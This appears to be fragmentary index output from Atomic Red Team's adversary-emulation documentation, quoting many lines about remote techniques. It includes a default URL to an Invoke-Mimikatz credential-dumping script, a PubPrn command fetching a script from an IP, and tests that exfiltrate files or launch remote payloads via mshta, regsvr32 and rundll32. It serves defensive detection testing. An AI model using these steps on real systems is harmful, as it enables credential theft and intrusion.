atomic-red-team windows-matrix.md | Hardware Additions CONTRIBUTE A TEST | JavaScript CONTRIBUTE A TEST | Authentication Package | At (Windows) | COR_PROFILER | Credentials from Web Browsers | Internet Connection Discovery CONTRIBUTE A TEST | Remote Desktop Protocol | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol CONTRIBUTE A TEST | Data Obfuscation CONTRIBUTE A TEST | Disk Content Wipe CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | Local Accounts | Malicious File | BITS Jobs | Authentication Package | Clear Command History | Credentials in Registry | Local Account | Remote Service Session Hijacking CONTRIBUTE A TEST | Data Staged CONTRIBUTE A TEST | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | Dead Drop Resolver CONTRIBUTE A TEST | Disk Structure Wipe CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | Phishing CONTRIBUTE A TEST | Malicious Link CONTRIBUTE A TEST | Boot or Logon Autostart Execution CONTRIBUTE A TEST | Boot or Logon Autostart Execution CONTRIBUTE A TEST | Clear Windows Event Logs | DCSync | Local Groups | Remote Services CONTRIBUTE A TEST | Data from Information Repositories CONTRIBUTE A TEST | Exfiltration Over Web Service | Domain Fronting CONTRIBUTE A TEST | Disk Wipe CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | Shared Modules CONTRIBUTE A TEST | Compromise Client Software Binary CONTRIBUTE A TEST | DLL Search Order Hijacking | DLL Search Order Hijacking | Input Capture CONTRIBUTE A TEST | Query Registry | Windows Remote Management | Keylogging | | Ingress Tool Transfer | Reflection Amplification CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | Software Deployment Tools | Create Account CONTRIBUTE A TEST | DLL Side-Loading | DLL Side-Loading | Kerberoasting | Remote System Discovery | | LLMNR/NBT-NS Poisoning and SMB Relay | | Internal Proxy | Resource Hijacking CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | Windows Management Instrumentation | Domain Account | Dynamic-link Library Injection | Disable or Modify System Firewall | Man-in-the-Middle CONTRIBUTE A TEST | System Location Discovery CONTRIBUTE A TEST | | Remote Data Staging CONTRIBUTE A TEST | | Multiband Communication CONTRIBUTE A TEST | System Shutdown/Reboot | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Domain Accounts CONTRIBUTE A TEST | Escape to Host CONTRIBUTE A TEST | Disable or Modify Tools | Modify Authentication Process CONTRIBUTE A TEST | System Network Configuration Discovery | | Remote Email Collection CONTRIBUTE A TEST | | Non-Application Layer Protocol | Transmitted Data Manipulation CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | External Remote Services | Group Policy Modification CONTRIBUTE A TEST | Dynamic-link Library Injection | Password Filter DLL | Time Based Evasion CONTRIBUTE A TEST | | | | Protocol Impersonation CONTRIBUTE A TEST | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Image File Execution Options Injection | LSASS Driver CONTRIBUTE A TEST | Execution Guardrails CONTRIBUTE A TEST | Password Spraying | | | | | Remote Access Software | | MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md * CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection) MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Dumps credentials from memory via Powershell by invoking a remote mimikatz script. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md | remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1| MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md This test is intended to be run from a remote workstation with domain admin context. MIT License. © 2018 Red Canary
atomic-red-team T1003.006.md <blockquote>Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller’s application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync. MIT License. © 2018 Red Canary
atomic-red-team T1003.006.md Works against a remote Windows Domain Controller using the replication protocol. MIT License. © 2018 Red Canary
atomic-red-team T1016.md <blockquote>Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route. MIT License. © 2018 Red Canary
atomic-red-team T1018.md # T1018 - Remote System Discovery
atomic-red-team T1018.md <blockquote>Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or net view using Net. Adversaries may also use local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems.
atomic-red-team T1018.md - Atomic Test #1 - Remote System Discovery - net
atomic-red-team T1018.md - Atomic Test #2 - Remote System Discovery - net group Domain Computers
atomic-red-team T1018.md - Atomic Test #3 - Remote System Discovery - nltest
atomic-red-team T1018.md - Atomic Test #4 - Remote System Discovery - ping sweep
atomic-red-team T1018.md - Atomic Test #5 - Remote System Discovery - arp
atomic-red-team T1018.md - Atomic Test #6 - Remote System Discovery - arp nix
atomic-red-team T1018.md - Atomic Test #7 - Remote System Discovery - sweep
atomic-red-team T1018.md - Atomic Test #8 - Remote System Discovery - nslookup
atomic-red-team T1018.md - Atomic Test #9 - Remote System Discovery - adidnsdump
atomic-red-team T1018.md - Atomic Test #12 - Remote System Discovery - ip neighbour
atomic-red-team T1018.md - Atomic Test #13 - Remote System Discovery - ip route
atomic-red-team T1018.md - Atomic Test #14 - Remote System Discovery - ip tcp_metrics
atomic-red-team T1018.md ## Atomic Test #1 - Remote System Discovery - net
atomic-red-team T1018.md Identify remote systems with net.exe.
atomic-red-team T1018.md ## Atomic Test #2 - Remote System Discovery - net group Domain Computers
atomic-red-team T1018.md Identify remote systems with net.exe querying the Active Directory Domain Computers group.
atomic-red-team T1018.md ## Atomic Test #3 - Remote System Discovery - nltest
atomic-red-team T1018.md ## Atomic Test #4 - Remote System Discovery - ping sweep
atomic-red-team T1018.md Identify remote systems via ping sweep.
atomic-red-team T1018.md ## Atomic Test #5 - Remote System Discovery - arp
atomic-red-team T1018.md Identify remote systems via arp.
atomic-red-team T1018.md ## Atomic Test #6 - Remote System Discovery - arp nix
atomic-red-team T1018.md Identify remote systems via arp.
atomic-red-team T1018.md ## Atomic Test #7 - Remote System Discovery - sweep
atomic-red-team T1018.md ## Atomic Test #8 - Remote System Discovery - nslookup
atomic-red-team T1018.md ## Atomic Test #9 - Remote System Discovery - adidnsdump
atomic-red-team T1018.md ## Atomic Test #12 - Remote System Discovery - ip neighbour
atomic-red-team T1018.md ## Atomic Test #13 - Remote System Discovery - ip route
atomic-red-team T1018.md ## Atomic Test #14 - Remote System Discovery - ip tcp_metrics
atomic-red-team T1021.001.md # T1021.001 - Remote Desktop Protocol
atomic-red-team T1021.001.md <blockquote>Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
atomic-red-team T1021.001.md Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)
atomic-red-team T1021.001.md Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the Accessibility Features technique for Persistence.(Citation: Alperovitch Malware)</blockquote>
atomic-red-team T1021.001.md Attempt an RDP session via Remote Desktop Application to a DomainController.
atomic-red-team T1021.001.md Attempt an RDP session via Remote Desktop Application over Powershell
atomic-red-team T1021.001.md Changing RDP Port to Non Standard Port via Remote Desktop Application over Powershell
atomic-red-team T1021.002.md <blockquote>Adversaries may use Valid Accounts to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
atomic-red-team T1021.002.md Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task/Job, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels.(Citation: Microsoft Admin Shares)</blockquote>
atomic-red-team T1021.002.md Connecting To Remote Shares
atomic-red-team T1021.002.md Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from https://docs.microsoft.com/en-us/sysinternals/downloads/psexec.
atomic-red-team T1021.002.md | remote_host | Remote computer to receive the copy and execute the file | String | \\localhost|
atomic-red-team T1021.002.md | output_file | Remote computer to receive the copy and execute the file | String | output.txt|
atomic-red-team T1021.003.md <blockquote>Adversaries may use Valid Accounts to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
atomic-red-team T1021.003.md The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
atomic-red-team T1021.003.md Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
atomic-red-team T1021.003.md Upon successful execution, cmd will spawn calc.exe on a remote computer.
atomic-red-team T1021.006.md # T1021.006 - Windows Remote Management
atomic-red-team T1021.006.md <blockquote>Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
atomic-red-team T1021.006.md WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the winrm command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014)</blockquote>
atomic-red-team T1021.006.md - Atomic Test #1 - Enable Windows Remote Management
atomic-red-team T1021.006.md ## Atomic Test #1 - Enable Windows Remote Management
atomic-red-team T1021.006.md Upon successful execution, powershell will “Enable-PSRemoting” allowing for remote PS access.
atomic-red-team T1021.006.md Execute Invoke-command on remote host.
atomic-red-team T1021.006.md | host_name | Remote Windows Host Name | String | localhost|
atomic-red-team T1021.006.md | remote_command | Command to execute on remote Host | String | ipconfig|
atomic-red-team T1021.006.md An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled
atomic-red-team T1021.006.md | destination_address | Remote Host IP or Hostname | String | Target|
atomic-red-team T1033.md | computer_name | Name of remote computer | String | localhost|
atomic-red-team T1046.md <blockquote>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.
atomic-red-team T1047.md <blockquote>Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)
atomic-red-team T1047.md An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)</blockquote>
atomic-red-team T1047.md - Atomic Test #4 - WMI Reconnaissance List Remote Services
atomic-red-team T1047.md - Atomic Test #6 - WMI Execute Remote Process
atomic-red-team T1047.md ## Atomic Test #4 - WMI Reconnaissance List Remote Services
atomic-red-team T1047.md An adversary might use WMI to check if a certain Remote Service is running on a remote device.
atomic-red-team T1047.md if the provided remote host is unreachable
atomic-red-team T1047.md ## Atomic Test #6 - WMI Execute Remote Process
atomic-red-team T1047.md This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter.
atomic-red-team T1047.md This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter.
atomic-red-team T1048.md Remote to Local
atomic-red-team T1048.md Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file.
atomic-red-team T1048.md Local to Remote
atomic-red-team T1048.003.md Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.
atomic-red-team T1048.003.md Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.
atomic-red-team T1048.003.md Upon successful execution, powershell will send an email with attached file to exfiltrate to a remote address. Results will be via stdout.
atomic-red-team T1049.md <blockquote>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
atomic-red-team T1053.001.md An adversary may use at in Linux environments to execute programs at system startup or on a scheduled basis for persistence. at can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.</blockquote>
atomic-red-team T1053.002.md An adversary may use at.exe in Windows environments to execute programs at system startup or on a scheduled basis for persistence. at can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).
atomic-red-team T1053.003.md An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. cron can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.</blockquote>
atomic-red-team T1053.005.md An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).</blockquote>
atomic-red-team T1053.005.md - Atomic Test #3 - Scheduled task Remote
atomic-red-team T1053.005.md ## Atomic Test #3 - Scheduled task Remote
atomic-red-team T1053.005.md Create a task on a remote system.
atomic-red-team T1053.005.md Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.
atomic-red-team T1055.md - Atomic Test #2 - Remote Process Injection in LSASS via mimikatz
atomic-red-team T1055.md ## Atomic Test #2 - Remote Process Injection in LSASS via mimikatz
atomic-red-team T1055.md It must be executed in the context of a user who is privileged on remote machine.
atomic-red-team T1059.001.md <blockquote>Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
atomic-red-team T1059.001.md write-host “Remote download of SharpHound.ps1 into memory, followed by execution of the script” -ForegroundColor Cyan
atomic-red-team T1059.001.md Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: “SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION”
atomic-red-team T1059.001.md Connect to a remote powershell session and interact with the host.
atomic-red-team T1059.002.md Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they’re already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute Native APIs, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via Python.(Citation: Macro Malware Targets Macs)</blockquote>
atomic-red-team T1070.005.md remote access to every disk volume on a network-connected system. These shares are automatically created at startup unless they have been
atomic-red-team T1070.005.md remote access to every disk volume on a network-connected system. As Microsoft puts it, “Missing administrative shares typically
atomic-red-team T1071.001.md <blockquote>Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
atomic-red-team T1071.004.md <blockquote>Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
atomic-red-team T1072.md Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
atomic-red-team T1078.001.md Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen Private Keys or credential materials to legitimately connect to remote environments via Remote Services.(Citation: Metasploit SSH Module)</blockquote>
atomic-red-team T1078.001.md After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
atomic-red-team T1078.001.md | remote_desktop_users_group_name | Specify the remote desktop users group name | String | Remote Desktop Users|
atomic-red-team T1078.003.md <blockquote>Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.
atomic-red-team T1078.004.md <blockquote>Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
atomic-red-team T1087.002.md | computer_name | Name of remote system to query | String | $env:COMPUTERNAME|
atomic-red-team T1098.004.md <blockquote>Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user’s home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.
atomic-red-team T1105.md - Atomic Test #1 - rsync remote file copy (push)
atomic-red-team T1105.md - Atomic Test #2 - rsync remote file copy (pull)
atomic-red-team T1105.md - Atomic Test #3 - scp remote file copy (push)
atomic-red-team T1105.md - Atomic Test #4 - scp remote file copy (pull)
atomic-red-team T1105.md - Atomic Test #5 - sftp remote file copy (push)
atomic-red-team T1105.md - Atomic Test #6 - sftp remote file copy (pull)
atomic-red-team T1105.md ## Atomic Test #1 - rsync remote file copy (push)
atomic-red-team T1105.md Utilize rsync to perform a remote file copy (push)
atomic-red-team T1105.md | remote_path | Remote path to receive rsync | Path | /tmp/victim-files|
atomic-red-team T1105.md | remote_host | Remote host to copy toward | String | victim-host|
atomic-red-team T1105.md | username | User account to authenticate on remote host | String | victim|
atomic-red-team T1105.md ## Atomic Test #2 - rsync remote file copy (pull)
atomic-red-team T1105.md Utilize rsync to perform a remote file copy (pull)
atomic-red-team T1105.md | remote_host | Remote host to copy from | String | adversary-host|
atomic-red-team T1105.md | username | User account to authenticate on remote host | String | adversary|
atomic-red-team T1105.md ## Atomic Test #3 - scp remote file copy (push)
atomic-red-team T1105.md Utilize scp to perform a remote file copy (push)
atomic-red-team T1105.md | remote_path | Remote path to receive scp | Path | /tmp/victim-files/|
atomic-red-team T1105.md ## Atomic Test #4 - scp remote file copy (pull)
atomic-red-team T1105.md Utilize scp to perform a remote file copy (pull)
atomic-red-team T1105.md ## Atomic Test #5 - sftp remote file copy (push)
atomic-red-team T1105.md Utilize sftp to perform a remote file copy (push)
atomic-red-team T1105.md | remote_path | Remote path to receive sftp | Path | /tmp/victim-files/|
atomic-red-team T1105.md ## Atomic Test #6 - sftp remote file copy (pull)
atomic-red-team T1105.md Utilize sftp to perform a remote file copy (pull)
atomic-red-team T1105.md | destination_path | Path to create remote file at. Default is local admin share. | String | \\localhost\C$|
atomic-red-team T1105.md Download a remote file using the whois utility
atomic-red-team T1105.md | remote_host | Remote hostname or IP address | String | localhost|
atomic-red-team T1105.md | remote_port | Remote port to connect to | Integer | 8443|
atomic-red-team T1105.md | query | Query to send to remote server | String | Hello from Atomic Red Team test T1105|
atomic-red-team T1105.md The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and output to a number of directories to simulate malicious behavior.
atomic-red-team T1105.md | remote_destination | Remote destination | String | www.example.com|
atomic-red-team T1112.md Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.
atomic-red-team T1112.md The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often Valid Accounts are required, along with access to the remote system’s SMB/Windows Admin Shares for RPC communication.</blockquote>
atomic-red-team T1112.md <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
atomic-red-team T1113.md <blockquote>Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)
atomic-red-team T1119.md <blockquote>Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a Command and Scripting Interpreter to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools.
atomic-red-team T1124.md <blockquote>An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)
atomic-red-team T1124.md System time information may be gathered in a number of ways, such as with Net on Windows by performing net time \\hostname to gather the system time on a remote system. The victim’s time zone may also be inferred from the current system time or gathered by using w32tm /tz. (Citation: Technet Windows Time Service)
atomic-red-team T1133.md # T1133 - External Remote Services
atomic-red-team T1133.md <blockquote>Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management can also be used externally.
atomic-red-team T1133.md Access to Valid Accounts to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.
atomic-red-team T1135.md <blockquote>Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
atomic-red-team T1135.md File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) Net can be used to query a remote system for available shared drives using the net view \\\\remotesystem command. It can also be used to query shared drives on the local system using net share.</blockquote>
atomic-red-team T1136.001.md <blockquote>Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account.
atomic-red-team T1136.001.md Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</blockquote>
atomic-red-team T1136.002.md Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</blockquote>
atomic-red-team T1136.003.md <blockquote>Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
atomic-red-team T1137.004.md | url | URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://) | String | file://PathToAtomicsFolder\T1137.004\src\T1137.004.html|
atomic-red-team T1140.md One such example is use of certutil to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)
atomic-red-team T1187.md The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.
atomic-red-team T1187.md * A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. Template Injection). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)
atomic-red-team T1187.md * A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)</blockquote>
atomic-red-team T1187.md This module runs the Windows executable of PetitPotam in order to coerce authentication for a remote system.
atomic-red-team T1197.md | remote_file | Remote file to download | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
atomic-red-team T1216.001.md PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png.</blockquote>
atomic-red-team T1216.001.md | remote_payload | A remote payload to execute using PubPrn.vbs. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct|
atomic-red-team T1218.001.md - Atomic Test #2 - Compiled HTML Help Remote Payload
atomic-red-team T1218.001.md ## Atomic Test #2 - Compiled HTML Help Remote Payload
atomic-red-team T1218.001.md Uses hh.exe to execute a remote compiled HTML Help payload.
atomic-red-team T1218.001.md | remote_chm_file | Remote .chm payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm| MIT License. © 2018 Red Canary
atomic-red-team T1218.003.md <blockquote>Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. MIT License. © 2018 Red Canary
atomic-red-team T1218.003.md Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application. MIT License. © 2018 Red Canary
atomic-red-team T1218.003.md - Atomic Test #1 - CMSTP Executing Remote Scriptlet MIT License. © 2018 Red Canary
atomic-red-team T1218.003.md ## Atomic Test #1 - CMSTP Executing Remote Scriptlet MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md - Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md - Atomic Test #3 - Mshta Executes Remote HTML Application (HTA) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md ## Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md ## Atomic Test #3 - Mshta Executes Remote HTML Application (HTA) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Execute an arbitrary remote HTA. Upon execution calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Executes an HTA Application by directly downloading from remote URI. MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md - Atomic Test #2 - Msiexec.exe - Execute Remote MSI file MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md ## Atomic Test #2 - Msiexec.exe - Execute Remote MSI file MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md - Atomic Test #2 - Regsvr32 remote COM scriptlet execution MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md ## Atomic Test #2 - Regsvr32 remote COM scriptlet execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject MIT License. © 2018 Red Canary
